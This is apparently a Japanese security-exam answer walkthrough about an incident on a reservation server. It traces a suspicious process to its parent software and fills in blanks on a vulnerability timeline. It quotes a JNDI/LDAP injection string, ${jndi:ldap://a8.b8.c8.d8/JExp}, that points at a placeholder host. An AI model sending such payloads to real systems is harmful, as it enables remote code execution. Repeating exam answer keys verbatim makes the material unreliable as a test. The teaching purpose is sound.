設問2 【予約サーバの調査】について答えよ。
(1)本文中の下線①について、Tソフトを調べれば分かると判断した理由を、40字以内で答えよ。
下線①には、「表3の内容から、runプロセスが稼働している原因の追求にはTソフトを調べる必要があると判断した。」とあります。
表3より、プロセスIDに注目しましょう。
親プロセスIDとプロセスIDには親子関係があるね。
プロセスID=100のjava BSoftMainは、java SBMainとrunプロセスの親プロセスIDになっているよ!
回答:runプロセスの親プロセスがTソフトのプロセスであるから。
(2)表7中の(b),(c)に入れる適切な時刻、表7中の(d)〜(f)に入れる適切な字句を答えよ。
図3の脆弱性Yをまとめると、以下の流れです。
表5より、実際の攻撃では、①の攻撃文字列が${jndi:ldap://a8.b8.c8.d8/JExp}となっています。
また、②のLDAPへのアクセスは、表6の時刻13:05:50のログが該当します。
以上より、考えると、答えは以下です。
b:13:04:32
c:13:05:50
d:a8.b8.c8.d8
e:LDAP
f:JExp
